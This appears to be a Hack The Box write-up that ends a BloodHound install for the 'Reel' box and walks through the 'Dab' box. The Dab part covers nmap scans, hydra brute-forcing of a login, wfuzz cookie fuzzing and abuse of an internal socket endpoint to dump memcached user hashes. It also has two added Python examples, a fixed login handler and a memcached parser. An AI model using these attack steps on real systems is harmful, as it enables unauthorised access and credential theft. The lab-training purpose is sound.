-rwxr-xr-x 1 nothing nothing 127561112 Jul 15 20:13 BloodHound
-rw-r--r-- 1 nothing nothing 179981 Jul 15 20:13 chrome_100_percent.pak
-rw-r--r-- 1 nothing nothing 321151 Jul 15 20:13 chrome_200_percent.pak
-rwxr-xr-x 1 nothing nothing 6322128 Jul 15 20:13 chrome-sandbox
-rw-r--r-- 1 nothing nothing 10505952 Jul 15 20:13 icudtl.dat
-rwxr-xr-x 1 nothing nothing 243992 Jul 15 20:13 libEGL.so
-rwxr-xr-x 1 nothing nothing 3103488 Jul 15 20:13 libffmpeg.so
-rwxr-xr-x 1 nothing nothing 8948976 Jul 15 20:13 libGLESv2.so
-rwxr-xr-x 1 nothing nothing 4488304 Jul 15 20:13 libvk_swiftshader.so
-rwxr-xr-x 1 nothing nothing 8483376 Jul 15 20:13 libvulkan.so
-rw-r--r-- 1 nothing nothing 1060 Jul 15 20:13 LICENSE
-rw-r--r-- 1 nothing nothing 4710103 Jul 15 20:13 LICENSES.chromium.html
drwxrwxr-x 2 nothing nothing 4096 Jul 15 20:13 locales
drwxrwxr-x 3 nothing nothing 4096 Jul 15 20:13 resources
-rw-r--r-- 1 nothing nothing 4835574 Jul 15 20:13 resources.pak
-rw-r--r-- 1 nothing nothing 50591 Jul 15 20:13 snapshot_blob.bin
drwxrwxr-x 2 nothing nothing 4096 Jul 15 20:13 swiftshader
-rw-r--r-- 1 nothing nothing 170904 Jul 15 20:13 v8_context_snapshot.bin
-rw-r--r-- 1 nothing nothing 5 Jul 15 20:13 version
-rw-r--r-- 1 nothing nothing 107 Jul 15 20:13 vk_swiftshader_icd.json
[ 10.10.16.9/23 ] [ /dev/pts/20 ] [Tools/Bloodhound/BloodHound-linux-x64]
→ sudo ln -s $(pwd)/BloodHound /usr/local/bin/bloodhound
[sudo] password for nothing:
![](prg/11/3.png) ![](prg/11/4.png) ![](prg/11/5.png)
As the screenshots show, this does not work with the current BloodHound release, which means you need the BloodHound version that was available at the time the box was released, so let's install the version from 2018:
[ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/HTB/Reel]
→ which bloodhound
/usr/local/bin/bloodhound
[ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/HTB/Reel]
→ rm /usr/local/bin/bloodhound
rm: cannot remove '/usr/local/bin/bloodhound': Permission denied
[ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/HTB/Reel]
→ sudo !!
[ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/HTB/Reel]
→ sudo rm /usr/local/bin/bloodhound
[sudo] password for nothing:
[ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/Tools]
→ ls -lash
total 12K
4.0K drwxr-xr-x 3 nothing nothing 4.0K Dec 27 21:19 .
4.0K drwxr-xr-x 28 nothing nothing 4.0K Mar 27 12:49 ..
4.0K drwxr-xr-x 3 nothing nothing 4.0K Dec 27 21:19 Bloodhound
[ 10.0.99.99/16 ] [ /dev/pts/2 ] [~/Tools]
→ rm -rf Bloodhound
[ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools]
→ wget https://github.com/BloodHoundAD/BloodHound/releases/download/2.0.4/BloodHound-linux-x64.zip
[ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools]
→ unzip BloodHound-linux-x64.zip
[ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools]
→ cd BloodHound-linux-x64
[ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
→ sudo ln -s $(pwd)/BloodHound /usr/local/bin/bloodhound
[sudo] password for nothing:
[ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
→ which bloodhound
/usr/local/bin/bloodhound
[ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
→ bloodhound
bloodhound: error while loading shared libraries: libgconf-2.so.4: cannot open shared object file: No such file or directory
[ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
→ sudo apt install libgconf-2-4 -y
Reading package lists... Done
[ 10.10.16.2/23 ] [ /dev/pts/14 ] [~/Tools/BloodHound-linux-x64]
→ bloodhound
Gtk-Message: 13:00:16.146: Failed to load module "gail"
Then we repeat the previous steps and see the result after uploading the acls.csv file:
## **Conclusion**
Here we can see the progress graph :

Hard/12.md Normal file
@ -0,0 +1,848 @@
# Dab Writeup
![](img/12.png)
## Introduction :
Dab is a hard linux box released back in August 2018.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~/_HTB/dab]
→ sudo nmap -vvv -sTU -p- 10.10.10.86 --max-retries 0 -Pn --min-rate=500 | grep Discovered
[sudo] password for nothing:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Discovered open port 80/tcp on 10.10.10.86
Discovered open port 22/tcp on 10.10.10.86
Discovered open port 21/tcp on 10.10.10.86
Discovered open port 8080/tcp on 10.10.10.86
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~/_HTB/dab]
→ sudo nmap -sCV -p80,21,22,8080 10.10.10.86
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-15 21:52 CET
Nmap scan report for 10.10.10.86
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 8803 Mar 26 2018 dab.jpg
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.16
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20:05:77:1e:73:66:bb:1e:7d:46:0f:65:50:2c:f9:0e (RSA)
| 256 61:ae:15:23:fc:bc:bc:29:13:06:f2:10:e0:0e:da:a0 (ECDSA)
|_ 256 2d:35:96:4c:5e:dd:5c:c0:63:f0:dc:86:f1:b1:76:b5 (ED25519)
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
| http-title: Login
|_Requested resource was http://10.10.10.86/login
8080/tcp open http nginx 1.10.3 (Ubuntu)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Internal Dev
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds
## **Part 2 : Getting User Access**
Our nmap scan picked up port 80 so let's investigate it:
![](prg/12/1.png)
We investigate using burpsuite's repeater:
![](prg/12/2.png)
Here we compare the error messages of login attempts with a plausible username (admin) and an improbable one (adminhaha):
![](prg/12/3.png) ![](prg/12/4.png)
So we got the following results:
admin >>> Error: Login failed
adminhaha >>> Error: Login failed**.**
This is something you should always check: do you get the same error message for different usernames? Here the two messages differ, which hints that admin is a valid username. Since the trailing dot tells us whether or not a username is valid, we're going to use hydra, matching on that message, to enumerate usernames.
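The oracle above, reproduced and fixed. This is an added example, not code from the box or the original post: `login_leaky` answers differently for an unknown user and for a wrong password (the "Login failed" / "Login failed." difference the writeup matches on with hydra), while `login_uniform` returns one failure message and always runs the password hash so that neither the text nor the timing reveals whether the account exists. The user store, passwords and function names are constructed for the example.

```python
"""Username-enumeration oracle in a login handler: leaky vs. uniform responses.

Added example for this writeup, not code from the original post or the box.
The first handler reproduces the defect the writeup exploits; the second is
the corrected form. The user store below is constructed.
"""
import hashlib
import hmac
import os


def _hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


# Constructed user store: username -> (salt, pbkdf2 hash). Only "admin" exists.
_SALT = os.urandom(16)
USERS = {"admin": (_SALT, _hash_password("correct horse", _SALT))}

# A dummy record so that unknown usernames cost the same work as known ones.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash_password("placeholder", _DUMMY_SALT)


def login_leaky(username, password):
    """Vulnerable: unknown user and wrong password produce different messages,
    and the unknown-user path skips the slow hash, so timing leaks as well."""
    record = USERS.get(username)
    if record is None:
        return False, "Error: Login failed."      # unknown username
    salt, expected = record
    if not hmac.compare_digest(_hash_password(password, salt), expected):
        return False, "Error: Login failed"       # known username, bad password
    return True, "Welcome"


def login_uniform(username, password):
    """Hardened: a single failure message, and the hash is always computed."""
    salt, expected = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    ok = hmac.compare_digest(_hash_password(password, salt), expected)
    if username not in USERS:
        ok = False  # the dummy record must never authenticate anyone
    return (True, "Welcome") if ok else (False, "Error: Login failed")


def responses_differ(handler, known, unknown, password="wrong"):
    """True when the handler's failure text reveals whether `known` exists."""
    return handler(known, password)[1] != handler(unknown, password)[1]


if __name__ == "__main__":
    for handler in (login_leaky, login_uniform):
        print(handler.__name__, "leaks usernames:",
              responses_differ(handler, "admin", "adminhaha"))
```

Keeping the messages identical is the part most frameworks get right; the dummy hash is the part that is usually missing, and without it a response-time comparison gives the same answer that the trailing dot gives here.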
![](prg/12/5.png)
[DATA] attacking http-post-form://10.10.10.86:80/login:username=^USER^&password=^PASS^&submit=Login:Login failed.<
[80][http-post-form] host: 10.10.10.86 login: ADMIN password: hahhahhaha
[80][http-post-form] host: 10.10.10.86 login: Admin password: hahhahhaha
[80][http-post-form] host: 10.10.10.86 login: Audrey password: hahhahhaha
[80][http-post-form] host: 10.10.10.86 login: DEFAULT password: hahhahhaha
[80][http-post-form] host: 10.10.10.86 login: DEMO password: hahhahhaha
[80][http-post-form] host: 10.10.10.86 login: Demo password: hahhahhaha
[80][http-post-form] host: 10.10.10.86 login: admin password: hahhahhaha
[80][http-post-form] host: 10.10.10.86 login: default password: hahhahhaha
[80][http-post-form] host: 10.10.10.86 login: demo password: hahhahhaha
Now that we have a list of usernames:
[ 10.10.14.16/23 ] [ /dev/pts/5 ] [~/_HTB/dab]
→ cat usernames
ADMIN
Admin
Audrey
DEFAULT
DEMO
Demo
admin
default
demo
we can try to find the password for one of these usernames using hydra and rockyou.txt
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
→ ls -lash /usr/share/wordlists/rockyou.txt
134M -rw-r--r-- 1 root root 134M Jul 17 2019 /usr/share/wordlists/rockyou.txt
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
→ hydra -L usernames -P /usr/share/wordlists/rockyou.txt 10.10.10.86 http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:failed"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-15 22:58:36
[DATA] max 16 tasks per 1 server, overall 16 tasks, 129099591 login tries (l:9/p:14344399), ~8068725 tries per task
[DATA] attacking http-post-form://10.10.10.86:80/login:username=^USER^&password=^PASS^&submit=Login:failed
[STATUS] 2643.00 tries/min, 2643 tries in 00:01h, 129096948 to do in 814:05h, 16 active
[80][http-post-form] host: 10.10.10.86 login: ADMIN password: Password1
And it looks like we have credentials, ADMIN:Password1, so let's log in:
![](prg/12/6.png)
It looks like an empty page with nothing useful on it; however, logging in populated something in memcache, as we're going to see later on. To continue, we're going to take a look at port 8080:
![](prg/12/7.png)
And here we get an error message telling us something about the auth cookie, so we need to figure out what the cookie is called. To do so we'll use wfuzz; when we run it without any filters, every response has the same 322 character length:
[ 10.10.14.16/23 ] [ /dev/pts/4 ] [/usr/share/wordlists]
→ wfuzz -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "Cookie: FUZZ" http://10.10.10.86:8080
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.86:8080/
Total requests: 2588
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000003: 200 14 L 30 W 322 Ch "page"
000000034: 200 14 L 30 W 322 Ch "login"
000000036: 200 14 L 30 W 322 Ch "content"
000000031: 200 14 L 30 W 322 Ch "s"
000000033: 200 14 L 30 W 322 Ch "excerpt"
000000007: 200 14 L 30 W 322 Ch "email"
000000035: 200 14 L 30 W 322 Ch "search"
000000015: 200 14 L 30 W 322 Ch "user"
000000030: 200 14 L 30 W 322 Ch "description"
000000001: 200 14 L 30 W 322 Ch "id"
000000032: 200 14 L 30 W 322 Ch "post"
000000029: 200 14 L 30 W 322 Ch "charset"
000000023: 200 14 L 30 W 322 Ch "order"
000000025: 200 14 L 30 W 322 Ch "p"
000000026: 200 14 L 30 W 322 Ch "key"
000000022: 200 14 L 30 W 322 Ch "mode"
000000028: 200 14 L 30 W 322 Ch "start"
000000024: 200 14 L 30 W 322 Ch "lang"
000000027: 200 14 L 30 W 322 Ch "status"
000000021: 200 14 L 30 W 322 Ch "data"
[...]
So we're going to filter out the 322 character length using the --hh 322 flag:
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
→ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "Cookie: FUZZ" --hh 322 http://10.10.10.86:8080
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.86:8080/
Total requests: 2588
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000005: 200 14 L 29 W 324 Ch "password"
Total time: 11.62986
Processed Requests: 2588
Filtered Requests: 2587
Requests/sec.: 222.5305
And we found it! The cookie is named "password". So let's use Burp Suite to make this process easier:
![](prg/12/7.png) ![](prg/12/8.png) ![](prg/12/9.png)
As expected, we get the "cookie not set" error. Now let's set the password cookie to a random value:
![](prg/12/10.png)
And as you can see here, we get a different error message than before. This means that the parameter "password" is valid but its value is not, so let's bruteforce the value with a wordlist; to do so we first need to know the response length for a wrong value:
![](prg/12/11.png)
In this case it is 324 characters, so we need to use wfuzz's --hh 324 flag:
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
→ wfuzz -c -w /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -H "Cookie: password=FUZZ" --hh 324 http://10.10.10.86:8080
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.86:8080/
Total requests: 10000
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000097: 200 21 L 48 W 540 Ch "secret"
Total time: 43.05595
Processed Requests: 10000
Filtered Requests: 9999
Requests/sec.: 232.2559
So when you set the cookie parameter 'password' to 'secret' you get the following:
![](prg/12/13.png) ![](prg/12/14.png) ![](prg/12/15.png) ![](prg/12/16.png)
And when you send random values to the prompts you get this URL and response:
http://10.10.10.86:8080/socket?port=nothing&cmd=nowhere
![](prg/12/17.png)
Now we don't need to use firefox to manually bruteforce this, let's use curl.
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=1&cmd=nothing'
500 Internal Server Error
# Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=21&cmd=nothing' -s |tail +8
Status of cache engine: Online
#### TCP socket test
Output
220 (vsFTPd 3.0.3)
530 Please login with USER and PASS.
%
So here we see something interesting: we can probe ports through that page. Let's trim the useless information from our output:
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=21&cmd=nothing' -s |tail +20 | head -n -4
220 (vsFTPd 3.0.3)
530 Please login with USER and PASS.
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=22&cmd=nothing' -s |tail +20 | head -n -4
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
Protocol mismatch.
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=80&cmd=nothing' -s |tail +20 | head -n -4
HTTP/1.1 400 Bad Request
Server: nginx/1.10.3 (Ubuntu)
Date: Sat, 16 Jan 2021 09:18:49 GMT
Content-Type: text/html
Content-Length: 182
Connection: close
<html>
<head><title>400 Bad Request</title></head>
<body bgcolor="white">
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/1.10.3 (Ubuntu)</center>
</body>
</html>
So let's use wfuzz again to enumerate the ports:
[ 10.10.14.16/23 ] [ /dev/pts/4 ] [~/_HTB/dab]
→ wfuzz -c -z range,1-65535 -u 'http://10.10.10.86:8080/socket?port=FUZZ&cmd=nothing' -H "Cookie: password=secret" --hc=500
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.86:8080/socket?port=FUZZ&cmd=nothing
Total requests: 65535
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000021: 200 28 L 61 W 627 Ch "21"
000000022: 200 28 L 55 W 629 Ch "22"
000000080: 200 40 L 84 W 1010 Ch "80"
000008080: 200 40 L 84 W 1010 Ch "8080"
000011211: 200 27 L 52 W 576 Ch "11211"
000050528: 200 27 L 52 W 577 Ch "50528"
Looks like we picked up something our nmap scan didn't see earlier, most likely because these two ports only listen on localhost and are reachable only through this server-side socket page:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd=nothing' -s |tail +20 | head -n -4
ERROR
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=50528&cmd=nothing' -s |tail +20 | head -n -4
These replies aren't very helpful on their own, but we now know these ports are most likely our next step. A bit of research on port 11211 shows it is the default port of [memcached](https://memcached.org/), and the bare ERROR above is exactly memcached's reply to an unrecognised command:
![](prg/12/18.png)
Based on this, we can enumerate memcached further:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd=version' -s |tail +20 | head -n -4
VERSION 1.4.25 Ubuntu
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd=stats slabs' -s |tail +20 | head -n -4
STAT 16:chunk_size 2904
STAT 16:chunks_per_page 361
STAT 16:total_pages 1
STAT 16:total_chunks 361
STAT 16:used_chunks 1
STAT 16:free_chunks 360
STAT 16:free_chunks_end 0
STAT 16:mem_requested 2880
STAT 16:get_hits 0
STAT 16:cmd_set 2
STAT 16:delete_hits 0
STAT 16:incr_hits 0
STAT 16:decr_hits 0
STAT 16:cas_hits 0
STAT 16:cas_badval 0
STAT 16:touch_hits 0
STAT 26:chunk_size 27120
STAT 26:chunks_per_page 38
STAT 26:total_pages 1
STAT 26:total_chunks 38
STAT 26:used_chunks 1
STAT 26:free_chunks 37
STAT 26:free_chunks_end 0
STAT 26:mem_requested 24699
STAT 26:get_hits 13640
STAT 26:cmd_set 29
STAT 26:delete_hits 0
STAT 26:incr_hits 0
STAT 26:decr_hits 0
STAT 26:cas_hits 0
STAT 26:cas_badval 0
STAT 26:touch_hits 0
STAT active_slabs 2
STAT total_malloced 2078904
END
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd=stats items' -s |tail +20 | head -n -4
STAT items:16:number 1
STAT items:16:age 48401
STAT items:16:evicted 0
STAT items:16:evicted_nonzero 0
STAT items:16:evicted_time 0
STAT items:16:outofmemory 0
STAT items:16:tailrepairs 0
STAT items:16:reclaimed 0
STAT items:16:expired_unfetched 0
STAT items:16:evicted_unfetched 0
STAT items:16:crawler_reclaimed 0
STAT items:16:crawler_items_checked 0
STAT items:16:lrutail_reflocked 0
STAT items:26:number 1
STAT items:26:age 48410
STAT items:26:evicted 0
STAT items:26:evicted_nonzero 0
STAT items:26:evicted_time 0
STAT items:26:outofmemory 0
STAT items:26:tailrepairs 0
STAT items:26:reclaimed 0
STAT items:26:expired_unfetched 0
STAT items:26:evicted_unfetched 0
STAT items:26:crawler_reclaimed 0
STAT items:26:crawler_items_checked 0
STAT items:26:lrutail_reflocked 0
END
So here we got the server version and OS, plus the memory classes, known as slabs, and the items stored in them. You can see the slab ids are 16 and 26; for each slab we can use **stats cachedump** to list the items it holds with their size and expiration timestamp:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd=stats cachedump 16 0' -s |tail +20 | head -n -4
ITEM stock [2807 b; 1610748196 s]
END
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd=stats cachedump 26 0' -s |tail +20 | head -n -4
ITEM users [24625 b; 1610748187 s]
END
We can also try to get the users data:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd=get users' -s |tail +20 | head -n -4
END
Well, not quite: the entry is gone from the cache, so we need to log in again like we did earlier:
![](prg/12/19.png)
Once logged in again, we get the users data, but it needs to be formatted correctly, otherwise it is unreadable:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd=get users' -s |tail +20 | head -n -4
VALUE users 0 24625
{"quinton_dach": "17906b445a05dc42f78ae86a92a57bbd", "jackie.abbott": "c6ab361604c4691f78958d6289910d21", "isidro": "e4a4c90483d2ef61de42af1f044087f3", "roy": "afbde995441e19497fe0695e9c539266", "colleen": "d3792794c3143f7e04fd57dc8b085cd4", "harrison.hessel": "bc5f9b43a0336253ff947a4f8dbdb74f", "asa.christiansen": "d7505316e9a10fc113126f808663b5a4", "jessie": "71f08b45555acc5259bcefa3af63f4e1", "milton_hintz": "8f61be2ebfc66a5f2496bbf849c89b84", "demario_homenick": "2c22da161f085a9aba62b9bbedbd4ca7", "paris": "ef9b20082b7c234c91e165c947f10b71", "gardner_ward": "eb7ed0e8c112234ab1439726a4c50162", "daija.casper": "4d0ed472e5714e5cca8ea7272b15173a", "alanna.prohaska": "6980ba8ee392b3fa6a054226b7d8dd8f", "russell_borer": "cb10b94b5dbb5dfab049070a2abda16e", "domenica.kulas": "5cb322691472f05130416b05b22d4cdf", "davon.kuhic": "e301e431db395ab3fdc123ba8be93ff9", "alana": "41c85abbc7c64d93ca7bda5e2cfc46c2", "bryana": "4d0da0f96ecd0e8b655573cd67b8a1c1", "elmo_welch": "89122bf3ade23faf37b470f1fa5c7358", "sasha": "fbabdcc0eb2ace9aa5b88148a02f78fe", "krystina.lynch": "1b4b73070f563b787afaf435943fac9c", "rick_kirlin": "8952b9d5be0dcb77bdf349cc0e79b49d", "elenora": "edbe5879fa4e452ceceedccf59067409", "broderick": "
[...]
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -s 'http://10.10.10.86:8080/socket?port=11211&cmd=get users' -H "Cookie: password=secret" | recode html..ascii | sed -n '/VALUE/{:a;n;/END/b;p;ba}' | jq .
{
"quinton_dach": "17906b445a05dc42f78ae86a92a57bbd",
"jackie.abbott": "c6ab361604c4691f78958d6289910d21",
"isidro": "e4a4c90483d2ef61de42af1f044087f3",
"roy": "afbde995441e19497fe0695e9c539266",
"colleen": "d3792794c3143f7e04fd57dc8b085cd4",
"harrison.hessel": "bc5f9b43a0336253ff947a4f8dbdb74f",
"asa.christiansen": "d7505316e9a10fc113126f808663b5a4",
"jessie": "71f08b45555acc5259bcefa3af63f4e1",
"milton_hintz": "8f61be2ebfc66a5f2496bbf849c89b84",
[...]
}
The catch is that the entry is dropped from memcache after about a minute, so you would have to log back in every time you wanted to read it again. We save it to a file instead:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -s 'http://10.10.10.86:8080/socket?port=11211&cmd=get users' -H "Cookie: password=secret" | recode html..ascii | sed -n '/VALUE/{:a;n;/END/b;p;ba}' | jq . > users.json
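A small parser for the memcached text protocol, added here as an example (it is not code from the original writeup). It handles the `stats cachedump` listing and the `VALUE ... END` framing of a `get`, slicing each data block by its declared length and refusing truncated replies, which is exactly what you hit when the entry expires mid-read. The two replies it parses are constructed samples shaped like the real ones above; the `html.unescape` step is an assumption that the proxy entity-encodes quotes, mirroring the `recode html..ascii` pipe.

```python
"""Parse memcached text-protocol replies such as those returned through the
/socket proxy.  Added example, not the writeup's own code; the replies below
are constructed to mirror the shapes seen on the box."""
from __future__ import annotations

import html
import json
import re

# Constructed sample of a `stats cachedump <slab> <limit>` reply.
SAMPLE_CACHEDUMP = (
    b"ITEM users [24625 b; 1610748187 s]\r\n"
    b"ITEM stock [12 b; 1610748187 s]\r\n"
    b"END\r\n"
)

# Constructed sample of a `get users` reply; the real value is ~24 KB of JSON.
USERS_JSON_SAMPLE = json.dumps({
    "quinton_dach": "17906b445a05dc42f78ae86a92a57bbd",
    "demo": "fe01ce2a7fbac8fafaed7c982a04e229",
}).encode()
SAMPLE_GET = (
    b"VALUE users 0 " + str(len(USERS_JSON_SAMPLE)).encode() + b"\r\n"
    + USERS_JSON_SAMPLE + b"\r\nEND\r\n"
)

ITEM_RE = re.compile(rb"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")
MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def parse_cachedump(raw: bytes) -> list[dict]:
    """Return [{'key', 'size', 'expires'}, ...] for each ITEM line up to END."""
    items = []
    for line in raw.split(b"\r\n"):
        if line == b"END":
            break
        m = ITEM_RE.match(line)
        if m:
            items.append({"key": m.group(1).decode(),
                          "size": int(m.group(2)),
                          "expires": int(m.group(3))})
    return items


def parse_get(raw: bytes) -> dict[str, bytes]:
    """Parse `VALUE <key> <flags> <bytes>\\r\\n<data>\\r\\n ... END\\r\\n`.

    The data block is sliced by its declared length rather than split on
    newlines, because a cached value may itself contain CR/LF.
    """
    values = {}
    pos = 0
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("reply truncated before END")
        header = raw[pos:eol]
        if header == b"END":
            return values
        parts = header.split()
        if len(parts) < 4 or parts[0] != b"VALUE":
            raise ValueError(f"unexpected line: {header!r}")
        key, nbytes = parts[1].decode(), int(parts[3])
        start = eol + 2
        data = raw[start:start + nbytes]
        if len(data) != nbytes or raw[start + nbytes:start + nbytes + 2] != b"\r\n":
            # Typical when the entry expired mid-read or the proxy cut the reply.
            raise ValueError(f"data block for {key!r} is truncated")
        values[key] = data
        pos = start + nbytes + 2


def extract_user_hashes(raw: bytes) -> dict[str, str]:
    """Decode the `users` value into {username: md5_hex}.

    html.unescape covers the (assumed) case where the proxy entity-encodes
    the quotes, the reason for the `recode html..ascii` pipe; it is a no-op
    on clean JSON.  Values that are not 32 lowercase hex chars are dropped.
    """
    text = html.unescape(parse_get(raw)["users"].decode())
    return {u: h for u, h in json.loads(text).items() if MD5_RE.match(h)}
```

Feed `parse_get` the body that `tail +20 | head -n -4` leaves behind, with `\n` normalised to `\r\n` if the proxy stripped the carriage returns; `extract_user_hashes` then gives you the same mapping as the jq output, already filtered to well-formed MD5 strings.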
Now here we need to get the hashes out of that json file:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ cat users.json
{
"quinton_dach": "17906b445a05dc42f78ae86a92a57bbd",
"jackie.abbott": "c6ab361604c4691f78958d6289910d21",
"isidro": "e4a4c90483d2ef61de42af1f044087f3",
"roy": "afbde995441e19497fe0695e9c539266",
"colleen": "d3792794c3143f7e04fd57dc8b085cd4",
[...]
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ cat users.json | jq -r 'to_entries | .[].value' |head -n10
17906b445a05dc42f78ae86a92a57bbd
c6ab361604c4691f78958d6289910d21
e4a4c90483d2ef61de42af1f044087f3
afbde995441e19497fe0695e9c539266
d3792794c3143f7e04fd57dc8b085cd4
bc5f9b43a0336253ff947a4f8dbdb74f
d7505316e9a10fc113126f808663b5a4
